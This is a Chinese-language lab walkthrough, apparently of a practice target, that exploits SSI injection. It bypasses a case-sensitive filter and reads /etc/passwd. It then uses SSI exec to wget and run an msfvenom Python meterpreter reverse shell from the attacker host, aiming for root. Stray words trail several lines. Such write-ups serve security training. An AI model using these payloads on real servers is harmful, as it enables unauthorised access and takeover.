主機:192.168.32.152html
靶機:192.168.32.161python
ssI是賦予html靜態頁面的動態效果,經過ssi執行命令,返回對應的結果,若在網站目錄中發現了.stm .shtm .shtml等,且對應SSL輸入沒有過濾
該網站可能存在SSI注入漏洞web
ssi注入就是尋找輸入點輸入相似<!--#exec cmd="命令" --> 格式,看看能不能運行系統命令。shell
如 <!--#exec cmd="ls" --> <!--#exec cmd="cat /etc/passwd" --> apache
切換目錄<!--#exec cmd="cd /root/dir/" -->服務器
nmap,nikto 分析,發現可能存在SSI注入,tcp
dirb 看看目錄測試
index目錄下,有個SSi語句優化
SSI目錄下看到應該是和命令注入有關網站
經過robots.txt目錄挖掘到站點的根目錄
打開網頁找一個注入點,測試後,在這裏找到,發現有過濾,大小寫可繞過,網頁給出的測試命名少了個!符號,加上測試成功
此時咱們就能夠嘗試生成一個python shell 上傳到網站服務器根目錄上,再執行反彈監聽
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444
在打開msfconsole監聽
此時再將生成的pyshell上傳至web根目錄(/var/www/html),再打開apache服務器
在開啓apache服務器,查看狀態
再將pyshell下載到站點上<!--#exec cmd="wget http://192.168.32.152/pyshell.py"-->
再提權
<!--#exec cmd="chmod 777 pyshell.py" -->
而後啓動python pyshell.py,成功反彈shell!
隨後,進入shell,優化終端,能夠進入root目錄